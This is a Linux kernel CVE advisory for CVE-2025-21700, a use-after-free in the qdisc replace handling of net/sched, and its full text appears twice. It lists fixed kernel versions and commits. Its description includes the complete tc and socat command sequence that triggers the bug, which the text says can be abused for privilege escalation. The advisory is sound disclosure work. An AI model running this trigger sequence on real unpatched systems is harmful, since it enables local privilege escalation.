cve/published/2025/CVE-2025-21700.mbox - pub/scm/linux/security/vulns - Git at Google

 From bippy-5f407fcff5a0 Mon Sep 17 00:00:00 2001
 From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
 To: <linux-cve-announce@vger.kernel.org>
 Reply-to: <cve@kernel.org>, <linux-kernel@vger.kernel.org>
 Subject: CVE-2025-21700: net: sched: Disallow replacing of child qdisc from one parent to another

 Description
 ===========

 In the Linux kernel, the following vulnerability has been resolved:

 net: sched: Disallow replacing of child qdisc from one parent to another

 Lion Ackermann was able to create a UAF which can be abused for privilege
 escalation with the following script

 Step 1. create root qdisc
 tc qdisc add dev lo root handle 1:0 drr

 step2. a class for packet aggregation do demonstrate uaf
 tc class add dev lo classid 1:1 drr

 step3. a class for nesting
 tc class add dev lo classid 1:2 drr

 step4. a class to graft qdisc to
 tc class add dev lo classid 1:3 drr

 step5.
 tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024

 step6.
 tc qdisc add dev lo parent 1:2 handle 3:0 drr

 step7.
 tc class add dev lo classid 3:1 drr

 step 8.
 tc qdisc add dev lo parent 3:1 handle 4:0 pfifo

 step 9. Display the class/qdisc layout

 tc class ls dev lo
  class drr 1:1 root leaf 2: quantum 64Kb
  class drr 1:2 root leaf 3: quantum 64Kb
  class drr 3:1 root leaf 4: quantum 64Kb

 tc qdisc ls
  qdisc drr 1: dev lo root refcnt 2
  qdisc plug 2: dev lo parent 1:1
  qdisc pfifo 4: dev lo parent 3:1 limit 1000p
  qdisc drr 3: dev lo parent 1:2

 step10. trigger the bug <=== prevented by this patch
 tc qdisc replace dev lo parent 1:3 handle 4:0

 step 11. Redisplay again the qdiscs/classes

 tc class ls dev lo
  class drr 1:1 root leaf 2: quantum 64Kb
  class drr 1:2 root leaf 3: quantum 64Kb
  class drr 1:3 root leaf 4: quantum 64Kb
  class drr 3:1 root leaf 4: quantum 64Kb

 tc qdisc ls
  qdisc drr 1: dev lo root refcnt 2
  qdisc plug 2: dev lo parent 1:1
  qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p
  qdisc drr 3: dev lo parent 1:2

 Observe that a) parent for 4:0 does not change despite the replace request.
 There can only be one parent.  b) refcount has gone up by two for 4:0 and
 c) both class 1:3 and 3:1 are pointing to it.

 Step 12.  send one packet to plug
 echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))
 step13.  send one packet to the grafted fifo
 echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003))

 step14. lets trigger the uaf
 tc class delete dev lo classid 1:3
 tc class delete dev lo classid 1:1

 The semantics of "replace" is for a del/add _on the same node_ and not
 a delete from one node(3:1) and add to another node (1:3) as in step10.
 While we could "fix" with a more complex approach there could be
 consequences to expectations so the patch takes the preventive approach of
 "disallow such config".

 Joint work with Lion Ackermann <nnamrec@gmail.com>

 The Linux kernel CVE team has assigned CVE-2025-21700 to this issue.


 Affected and fixed versions
 ===========================

 	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 5.4.291 with commit cd796e269123e1994bfc4e99dd76680ba0946a97
 	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 5.10.235 with commit fe18c21d67dc7d1bcce1bba56515b1b0306db19b
 	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 5.15.179 with commit 38646749d6e12f9d80a08d21ca39f0beca20230d
 	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 6.1.129 with commit deda09c0543a66fa51554abc5ffd723d99b191bf
 	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 6.6.76 with commit 7e2bd8c13b07e29a247c023c7444df23f9a79fd8
 	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 6.12.13 with commit 73c7e1d6898ccbeee126194dcc05f58b8a795e70
 	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 6.13.2 with commit 46c59ec33ec98aba20c15117630cae43a01404cc
 	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 6.14 with commit bc50835e83f60f56e9bec2b392fb5544f250fb6f

 Please see https://www.kernel.org for a full list of currently supported
 kernel versions by the kernel community.

 Unaffected versions might change over time as fixes are backported to
 older supported kernel versions.  The official CVE entry at
 	https://cve.org/CVERecord/?id=CVE-2025-21700
 will be updated if fixes are backported, please check that for the most
 up to date information about this issue.


 Affected files
 ==============

 The file(s) affected by this issue are:
 	net/sched/sch_api.c


 Mitigation
 ==========

 The Linux kernel CVE team recommends that you update to the latest
 stable kernel version for this, and many other bugfixes.  Individual
 changes are never tested alone, but rather are part of a larger kernel
 release.  Cherry-picking individual commits is not recommended or
 supported by the Linux kernel community at all.  If however, updating to
 the latest release is impossible, the individual changes to resolve this
 issue can be found at these commits:
 	https://git.kernel.org/stable/c/cd796e269123e1994bfc4e99dd76680ba0946a97
 	https://git.kernel.org/stable/c/fe18c21d67dc7d1bcce1bba56515b1b0306db19b
 	https://git.kernel.org/stable/c/38646749d6e12f9d80a08d21ca39f0beca20230d
 	https://git.kernel.org/stable/c/deda09c0543a66fa51554abc5ffd723d99b191bf
 	https://git.kernel.org/stable/c/7e2bd8c13b07e29a247c023c7444df23f9a79fd8
 	https://git.kernel.org/stable/c/73c7e1d6898ccbeee126194dcc05f58b8a795e70
 	https://git.kernel.org/stable/c/46c59ec33ec98aba20c15117630cae43a01404cc
 	https://git.kernel.org/stable/c/bc50835e83f60f56e9bec2b392fb5544f250fb6f
	From bippy-5f407fcff5a0 Mon Sep 17 00:00:00 2001
	From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
	To: <linux-cve-announce@vger.kernel.org>
	Reply-to: <cve@kernel.org>, <linux-kernel@vger.kernel.org>
	Subject: CVE-2025-21700: net: sched: Disallow replacing of child qdisc from one parent to another

	Description
	===========

	In the Linux kernel, the following vulnerability has been resolved:

	net: sched: Disallow replacing of child qdisc from one parent to another

	Lion Ackermann was able to create a UAF which can be abused for privilege
	escalation with the following script

	Step 1. create root qdisc
	tc qdisc add dev lo root handle 1:0 drr

	step2. a class for packet aggregation do demonstrate uaf
	tc class add dev lo classid 1:1 drr

	step3. a class for nesting
	tc class add dev lo classid 1:2 drr

	step4. a class to graft qdisc to
	tc class add dev lo classid 1:3 drr

	step5.
	tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024

	step6.
	tc qdisc add dev lo parent 1:2 handle 3:0 drr

	step7.
	tc class add dev lo classid 3:1 drr

	step 8.
	tc qdisc add dev lo parent 3:1 handle 4:0 pfifo

	step 9. Display the class/qdisc layout

	tc class ls dev lo
	class drr 1:1 root leaf 2: quantum 64Kb
	class drr 1:2 root leaf 3: quantum 64Kb
	class drr 3:1 root leaf 4: quantum 64Kb

	tc qdisc ls
	qdisc drr 1: dev lo root refcnt 2
	qdisc plug 2: dev lo parent 1:1
	qdisc pfifo 4: dev lo parent 3:1 limit 1000p
	qdisc drr 3: dev lo parent 1:2

	step10. trigger the bug <=== prevented by this patch
	tc qdisc replace dev lo parent 1:3 handle 4:0

	step 11. Redisplay again the qdiscs/classes

	tc class ls dev lo
	class drr 1:1 root leaf 2: quantum 64Kb
	class drr 1:2 root leaf 3: quantum 64Kb
	class drr 1:3 root leaf 4: quantum 64Kb
	class drr 3:1 root leaf 4: quantum 64Kb

	tc qdisc ls
	qdisc drr 1: dev lo root refcnt 2
	qdisc plug 2: dev lo parent 1:1
	qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p
	qdisc drr 3: dev lo parent 1:2

	Observe that a) parent for 4:0 does not change despite the replace request.
	There can only be one parent. b) refcount has gone up by two for 4:0 and
	c) both class 1:3 and 3:1 are pointing to it.

	Step 12. send one packet to plug
	echo "" \| socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))
	step13. send one packet to the grafted fifo
	echo "" \| socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003))

	step14. lets trigger the uaf
	tc class delete dev lo classid 1:3
	tc class delete dev lo classid 1:1

	The semantics of "replace" is for a del/add _on the same node_ and not
	a delete from one node(3:1) and add to another node (1:3) as in step10.
	While we could "fix" with a more complex approach there could be
	consequences to expectations so the patch takes the preventive approach of
	"disallow such config".

	Joint work with Lion Ackermann <nnamrec@gmail.com>

	The Linux kernel CVE team has assigned CVE-2025-21700 to this issue.


	Affected and fixed versions
	===========================

	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 5.4.291 with commit cd796e269123e1994bfc4e99dd76680ba0946a97
	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 5.10.235 with commit fe18c21d67dc7d1bcce1bba56515b1b0306db19b
	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 5.15.179 with commit 38646749d6e12f9d80a08d21ca39f0beca20230d
	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 6.1.129 with commit deda09c0543a66fa51554abc5ffd723d99b191bf
	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 6.6.76 with commit 7e2bd8c13b07e29a247c023c7444df23f9a79fd8
	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 6.12.13 with commit 73c7e1d6898ccbeee126194dcc05f58b8a795e70
	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 6.13.2 with commit 46c59ec33ec98aba20c15117630cae43a01404cc
	Issue introduced in 2.6.12 with commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 and fixed in 6.14 with commit bc50835e83f60f56e9bec2b392fb5544f250fb6f

	Please see https://www.kernel.org for a full list of currently supported
	kernel versions by the kernel community.

	Unaffected versions might change over time as fixes are backported to
	older supported kernel versions. The official CVE entry at
	https://cve.org/CVERecord/?id=CVE-2025-21700
	will be updated if fixes are backported, please check that for the most
	up to date information about this issue.


	Affected files
	==============

	The file(s) affected by this issue are:
	net/sched/sch_api.c


	Mitigation
	==========

	The Linux kernel CVE team recommends that you update to the latest
	stable kernel version for this, and many other bugfixes. Individual
	changes are never tested alone, but rather are part of a larger kernel
	release. Cherry-picking individual commits is not recommended or
	supported by the Linux kernel community at all. If however, updating to
	the latest release is impossible, the individual changes to resolve this
	issue can be found at these commits:
	https://git.kernel.org/stable/c/cd796e269123e1994bfc4e99dd76680ba0946a97
	https://git.kernel.org/stable/c/fe18c21d67dc7d1bcce1bba56515b1b0306db19b
	https://git.kernel.org/stable/c/38646749d6e12f9d80a08d21ca39f0beca20230d
	https://git.kernel.org/stable/c/deda09c0543a66fa51554abc5ffd723d99b191bf
	https://git.kernel.org/stable/c/7e2bd8c13b07e29a247c023c7444df23f9a79fd8
	https://git.kernel.org/stable/c/73c7e1d6898ccbeee126194dcc05f58b8a795e70
	https://git.kernel.org/stable/c/46c59ec33ec98aba20c15117630cae43a01404cc
	https://git.kernel.org/stable/c/bc50835e83f60f56e9bec2b392fb5544f250fb6f